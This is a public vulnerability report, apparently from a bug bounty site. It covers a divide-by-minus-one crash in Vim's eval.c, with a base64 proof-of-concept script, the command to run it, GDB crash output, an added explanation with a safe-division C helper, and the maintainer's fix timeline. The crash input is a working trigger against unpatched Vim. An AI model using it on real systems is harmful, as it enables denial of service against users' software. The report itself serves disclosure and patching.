Floating point exception in function num_divide at eval in vim/vim

Valid

Reported on

Oct 18th 2022


Floating point exception in function num_divide at eval.c:70

Impact

vim version

git log -1
commit db4c94788ad70118fa1ccc5fbc821757350ac771 (HEAD -> master, tag: v9.0.0769, origin/master, origin/HEAD)

Proof of Concept

# ./src/vim -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
Floating point exception

Content of poc_min (base64 encoded):

Y2FsIHMoMC8wLy0x

GDB output:

pwndbg> r -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
Starting program: /root/vim/src/vim -u NONE -X -Z -e -s -S ./poc_min -c ':qa!'
warning: Error disabling address space randomization: Operation not permitted
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGFPE, Arithmetic exception.
0x00005610b5f67cdb in num_divide (n2=-1, n1=<optimized out>, failed=<optimized out>) at eval.c:70
70              result = n1 / n2;
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───[ REGISTERS / show-flags off / show-compact-regs off ]──
*RAX  0x8000000000000000
*RBX  0x7ffee0e09ca0 ◂— 0x0
*RCX  0x5610b748d820 (__afl_area_initial) ◂— 0x0
*RDX  0xffffffffffffffff
*RDI  0x5610b6a9f760 (__afl_area_ptr) —▸ 0x5610b748d820 (__afl_area_initial) ◂— 0x0
*RSI  0x2f
 R8   0x0
*R9   0xfffdc1c136c ◂— 0x0
*R10  0x7ffee0e095a0 ◂— 0x0
*R11  0xffffffffffffffff
*R12  0x7ffee0e09c60 ◂— 0x5
*R13  0x7ffee0e0aa40 ◂— 0x5
*R14  0x7ffee0e0afd0 ◂— 0x1
*R15  0x8000000000000000
*RBP  0x7ffee0e09d90 —▸ 0x7ffee0e0a030 —▸ 0x7ffee0e0a170 —▸ 0x7ffee0e0a2f0 —▸ 0x7ffee0e0a550 ◂— ...
*RSP  0x7ffee0e09c20 ◂— 0x41b58ab3
*RIP  0x5610b5f67cdb (eval7+2587) ◂— idiv   r11
────[ DISASM / x86-64 / set emulate on ]───
 ► 0x5610b5f67cdb <eval7+2587>    idiv   r11


──────[ SOURCE (CODE) ]───────
In file: /root/vim/src/eval.c
   65       result = -VARNUM_MAX;
   66   else
   67       result = VARNUM_MAX;
   68     }
   69     else
 ► 70   result = n1 / n2;
   71 
   72     return result;
   73 }
   74 
   75 /*
─────[ STACK ]──────
00:0000│ rsp 0x7ffee0e09c20 ◂— 0x41b58ab3
01:0008│     0x7ffee0e09c28 —▸ 0x5610b6857698 ◂— '4 32 4 14 getnext.i:2442 48 4 12 getnext:3539 64 16 9 var2:3540 96 4 10 error:3545'
02:0010│     0x7ffee0e09c30 —▸ 0x5610b5f672c0 (eval7) ◂— push   rbp
03:0018│     0x7ffee0e09c38 ◂— 0x0
... ↓        4 skipped
───────[ BACKTRACE ]────
 ► f 0   0x5610b5f67cdb eval7+2587
   f 1   0x5610b5f67cdb eval7+2587
   f 2   0x5610b5f65b0b eval6+299
   f 3   0x5610b5f650b1 eval5+209
   f 4   0x5610b5f644a5 eval4+325
   f 5   0x5610b5f63513 eval3+275
   f 6   0x5610b5f3e02b eval1+395
   f 7   0x5610b5f3e02b eval1+395


pwndbg> bt
#0  0x00005610b5f67cdb in num_divide (n2=-1, n1=<optimized out>, failed=<optimized out>) at eval.c:70
#1  eval7 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0, want_string=0) at eval.c:3666
#2  0x00005610b5f65b0b in eval6 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:3309
#3  0x00005610b5f650b1 in eval5 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0xffffffffffffffff) at eval.c:3198
#4  0x00005610b5f644a5 in eval4 (arg=<optimized out>, rettv=<optimized out>, evalarg=<optimized out>) at eval.c:3049
#5  0x00005610b5f63513 in eval3 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:2910
#6  0x00005610b5f3e02b in eval2 (arg=0x7ffee0e0a920, rettv=0x7ffee0e0aa40, evalarg=0x7ffee0e0afd0) at eval.c:2784
#7  eval1 (arg=0x7ffee0e0a920, rettv=<optimized out>, evalarg=0x7ffee0e0afd0) at eval.c:2630
#8  0x00005610b6628019 in get_func_arguments (arg=0x7ffee0e0aa20, evalarg=<optimized out>, partial_argc=<optimized out>, argvars=<optimized out>, argcount=<optimized out>) at userfunc.c:1757
#9  0x00005610b66272cf in get_func_tv (name=<optimized out>, len=<optimized out>, rettv=<optimized out>, arg=<optimized out>, evalarg=<optimized out>, funcexe=<optimized out>) at userfunc.c:1820
#10 0x00005610b664b469 in ex_call_inner (eap=0x7ffee0e0b2e0, name=0x5610b6a9f760 <__afl_area_ptr> " \330H\267\020V", arg=0x5610b748d820 <__afl_area_initial>, startarg=0x7ffee0e095a0 "", evalarg=0x0, funcexe_init=<optimized out>) at userfunc.c:5647
#11 ex_call (eap=0x7ffee0e0b2e0) at userfunc.c:5971
#12 0x00005610b5ff046a in do_one_cmd (cmdlinep=0x7ffee0e0b510, flags=7, cstack=0x7ffee0e0b530, fgetline=0x5610b6445a50 <getsourceline>, cookie=0x7ffee0e0c120) at ex_docmd.c:2578
#13 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:990
#14 0x00005610b6443024 in do_source_ext (fname=<optimized out>, check_other=<optimized out>, is_vimrc=<optimized out>, ret_sid=<optimized out>, eap=<optimized out>, clearvars=<optimized out>) at scriptfile.c:1667
#15 0x00005610b6440c95 in do_source (check_other=0, is_vimrc=0, ret_sid=0x0, fname=<optimized out>) at scriptfile.c:1811
#16 cmd_source (fname=<optimized out>, eap=0x7ffee0e0c460) at scriptfile.c:1163
#17 0x00005610b5ff046a in do_one_cmd (cmdlinep=0x7ffee0e0c690, flags=11, cstack=0x7ffee0e0c6b0, fgetline=0x0, cookie=0x0) at ex_docmd.c:2578
#18 do_cmdline (cmdline=<optimized out>, fgetline=<optimized out>, cookie=<optimized out>, flags=<optimized out>) at ex_docmd.c:990
#19 0x00005610b6809f1a in exe_commands (parmp=<optimized out>) at main.c:3135
#20 vim_main2 () at main.c:781
#21 0x00005610b680720c in main (argc=11, argv=0x7ffee0e0f9c8) at main.c:432
#22 0x00007f887ac9cd90 in __libc_start_call_main (main=main@entry=0x5610b6802900 <main>, argc=argc@entry=11, argv=argv@entry=0x7ffee0e0f9c8) at ../sysdeps/nptl/libc_start_call_main.h:58
#23 0x00007f887ac9ce40 in __libc_start_main_impl (main=0x5610b6802900 <main>, argc=11, argv=0x7ffee0e0f9c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffee0e0f9b8) at ../csu/libc-start.c:392
#24 0x00005610b5d2a265 in _start ()

Impact

This vulnerability is capable of crashing software.

Report of the Information Security Laboratory of Ocean University of China @OUC_ISLOUC @OUC_Blue_Whale
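Added illustration, not code from the report or from Vim: the register dump above shows the faulting idiv with the dividend RDX:RAX = 0x8000000000000000 sign-extended (INT64_MIN) and the divisor R11 = -1, the one two's-complement quotient (2^63) that does not fit in 64 bits, so the CPU raises #DE and the process dies with SIGFPE instead of Vim's eval.c:70 ever returning. The helper below shows the two operand checks a signed division routine needs so that it never traps; the names safe_divide, divide_fails and poc_expression and the saturation policy for a zero divisor are assumptions for this example.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#define VARNUM_MAX INT64_MAX
#define VARNUM_MIN INT64_MIN

/* Added example, not Vim's num_divide(): signed 64-bit division that never
 * hands the hardware an operand pair whose quotient is undefined.  *failed
 * is set when the result is a saturated substitute, not a true quotient. */
static int64_t safe_divide(int64_t n1, int64_t n2, bool *failed)
{
    if (failed != NULL)
        *failed = false;
    if (n2 == 0) {
        /* n/0 is undefined in C and traps on x86 (#DE -> SIGFPE).  Policy,
         * assumed here: 0/0 yields INT64_MIN, the 0x8000000000000000 seen in
         * RAX in the report; any other dividend saturates. */
        if (failed != NULL)
            *failed = true;
        return n1 == 0 ? VARNUM_MIN : (n1 < 0 ? -VARNUM_MAX : VARNUM_MAX);
    }
    if (n1 == VARNUM_MIN && n2 == -1) {
        /* The only other overflowing pair: INT64_MIN / -1 = 2^63 does not fit
         * in int64_t, so idiv traps exactly as at eval.c:70 (n2=-1). */
        if (failed != NULL)
            *failed = true;
        return VARNUM_MAX;
    }
    return n1 / n2;  /* every remaining pair is well defined */
}

/* Failure flag alone, for callers and tests. */
static bool divide_fails(int64_t n1, int64_t n2)
{
    bool failed = false;
    (void)safe_divide(n1, n2, &failed);
    return failed;
}

/* The report's expression evaluated left to right, (0 / 0) / -1: the first
 * division produces INT64_MIN and the second is the pair that trapped. */
static int64_t poc_expression(void)
{
    return safe_divide(safe_divide(0, 0, NULL), -1, NULL);
}

int main(void)
{
    printf("(0/0)/-1 -> %lld fails=%d\n", (long long)poc_expression(), divide_fails(VARNUM_MIN, -1));
    return 0;
}
```

The same two checks (divisor zero, INT64_MIN with divisor -1) are the complete set of trapping inputs for two's-complement integer division, so a fuzzer exercising `/` and `%` with those boundary values is a cheap regression test.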

We are processing your report and will contact the vim team within 24 hours. a year ago
We have contacted a member of the vim team and are waiting to hear back a year ago
Bram Moolenaar validated this vulnerability a year ago

Interesting corner case.

ex7l0it has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Bram Moolenaar
a year ago

Maintainer


Fixed with patch 9.0.0804

Bram Moolenaar marked this as fixed in 9.0.0804 with commit cdef1c a year ago
Bram Moolenaar has been awarded the fix bounty
This vulnerability has now been published a year ago